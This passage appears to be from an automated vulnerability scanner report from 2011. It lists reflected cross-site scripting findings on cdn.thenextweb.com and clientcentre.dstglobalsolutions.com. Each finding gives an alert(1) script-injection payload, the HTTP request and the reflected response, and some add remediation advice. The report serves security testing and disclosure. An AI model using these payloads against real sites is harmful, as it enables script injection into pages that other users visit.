<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
text/javascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themese76aa</script><script>alert(1)</script>8a6504a518d/tnw_6/style.css?ver=8.21'
    };
</script>
...[SNIP]...

3.85. http://cdn.thenextweb.com/wp-content/themes/tnw_6/style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d6d3</script><script>alert(1)</script>577051df666 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response: the 404 page's inline $_CONFIG object assigns the raw request path to 'current_url'.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the payload contains a literal </script>, the HTML parser closes the script element at that point and opens a new one, so the injected script executes regardless of the surrounding single-quoted string.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, encode it for the JavaScript string context and also escape <, > and & as \u003c, \u003e and \u0026, so that a reflected </script> cannot terminate the element; escaping only the quote character does not stop this attack. In PHP, json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP) produces a literal that is safe in this position.

Request

GET /wp-content/themes/tnw_62d6d3</script><script>alert(1)</script>577051df666/style.css?ver=8.21 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.0.144
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:49 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=67sbs1oah3b2mtf624u89il9c0; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26096
Date: Wed, 05 Oct 2011 20:56:15 GMT
Age: 1
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
avascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_62d6d3</script><script>alert(1)</script>577051df666/style.css?ver=8.21'
    };
</script>
...[SNIP]...

3.86. http://cdn.thenextweb.com/wp-content/themes/tnw_6/style.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2a63</script><script>alert(1)</script>9807f8e6f38 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response: the 404 page's inline $_CONFIG object assigns the raw request path to 'current_url'.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the payload contains a literal </script>, the HTML parser closes the script element at that point and opens a new one, so the injected script executes regardless of the surrounding single-quoted string.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, encode it for the JavaScript string context and also escape <, > and & as \u003c, \u003e and \u0026, so that a reflected </script> cannot terminate the element; escaping only the quote character does not stop this attack. In PHP, json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP) produces a literal that is safe in this position.

Request

GET /wp-content/themes/tnw_6/style.cssa2a63</script><script>alert(1)</script>9807f8e6f38?ver=8.21 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 127.0.0.1
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:56:37 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=bflbl927msg5hsh0fk4708emj7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:56:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26096
Date: Wed, 05 Oct 2011 20:56:38 GMT
Age: 1
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
>
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/style.cssa2a63</script><script>alert(1)</script>9807f8e6f38?ver=8.21'
    };
</script>
...[SNIP]...

3.87. http://clientcentre.dstglobalsolutions.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75ca7'-alert(1)-'6f3146d22d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?75ca7'-alert(1)-'6f3146d22d1=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.dstglobalsolutions.com/investmentmanagementsolutions.cfm?tab_id=3#tablist
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:45:38 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19202
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
switch?openagent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/home.nsf/?75ca7'-alert(1)-'6f3146d22d1=1'
           HTTP_Referer = 'http://www.dstglobalsolutions.com/investmentmanagementsolutions.cfm?tab_id=3#tablist'
           RedirectTo = ''

   </script>
...[SNIP]...

3.88. http://clientcentre.dstglobalsolutions.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dfa2"><script>alert(1)</script>f11387889d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?1dfa2"><script>alert(1)</script>f11387889d2=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.dstglobalsolutions.com/investmentmanagementsolutions.cfm?tab_id=3#tablist
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:45:34 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19258
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/home.nsf/?1dfa2"><script>alert(1)</script>f11387889d2=1" name="RedirectTo" />
...[SNIP]...

3.89. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [OpenForm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotpw

Issue detail

The value of the OpenForm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8fc4'-alert(1)-'3f3ecb669ce was submitted in the OpenForm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Registration.nsf/forgotpw?OpenForme8fc4'-alert(1)-'3f3ecb669ce HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.3.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:22 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19147
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/registration.nsf/forgotpw?openforme8fc4'-alert(1)-'3f3ecb669ce'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.90. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [OpenForm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotpw

Issue detail

The value of the OpenForm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8d41"><script>alert(1)</script>17cc96b90c8 was submitted in the OpenForm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Registration.nsf/forgotpw?OpenFormd8d41"><script>alert(1)</script>17cc96b90c8 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.3.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:18 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19207
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw?OpenFormd8d41"><script>alert(1)</script>17cc96b90c8" name="RedirectTo" />
...[SNIP]...

3.91. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotpw

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98d1e"><script>alert(1)</script>79ae44372ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Registration.nsf/forgotpw98d1e"><script>alert(1)</script>79ae44372ae?OpenForm HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.3.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19233
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw98d1e"><script>alert(1)</script>79ae44372ae?OpenForm" name="RedirectTo" />
...[SNIP]...

3.92. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotpw

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2801'%3bb3bb804ad0e was submitted in the REST URL parameter 2. This input was echoed as e2801';b3bb804ad0e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Registration.nsf/forgotpwe2801'%3bb3bb804ad0e?OpenForm HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.3.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:42 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19140
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
agent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/registration.nsf/forgotpwe2801';b3bb804ad0e?openform'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.93. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotpw

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb440"><script>alert(1)</script>374bab39861 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Registration.nsf/forgotpw?OpenForm&bb440"><script>alert(1)</script>374bab39861=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.3.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:30 GMT
Last-Modified: Wed, 05 Oct 2011 19:46:28 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 22940
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Forgotten Password Request</title>
   <base href="http://clientcentre.dstgl
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw?OpenForm&bb440"><script>alert(1)</script>374bab39861=1" name="RedirectTo" />
...[SNIP]...

3.94. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotpw

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 784f0'-alert(1)-'f511029aa62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Registration.nsf/forgotpw?OpenForm&784f0'-alert(1)-'f511029aa62=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.3.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:34 GMT
Last-Modified: Wed, 05 Oct 2011 19:46:32 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 22851
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Forgotten Password Request</title>
   <base href="http://clientcentre.dstgl
...[SNIP]...
+ '~' + cServer
                       }
//                        alert(redir)
                       location = (redir)                
                   }
               }
           }

           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/registration.nsf/forgotpw?openform&784f0'-alert(1)-'f511029aa62=1'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.95. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [OpenForm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotusername

Issue detail

The value of the OpenForm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74c82'-alert(1)-'746a4e367a2 was submitted in the OpenForm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Registration.nsf/forgotusername?OpenForm74c82'-alert(1)-'746a4e367a2 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.4.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:23 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19171
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
erverNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/registration.nsf/forgotusername?openform74c82'-alert(1)-'746a4e367a2'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.96. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [OpenForm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotusername

Issue detail

The value of the OpenForm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56101"><script>alert(1)</script>b1838b56821 was submitted in the OpenForm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Registration.nsf/forgotusername?OpenForm56101"><script>alert(1)</script>b1838b56821 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.4.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:19 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19231
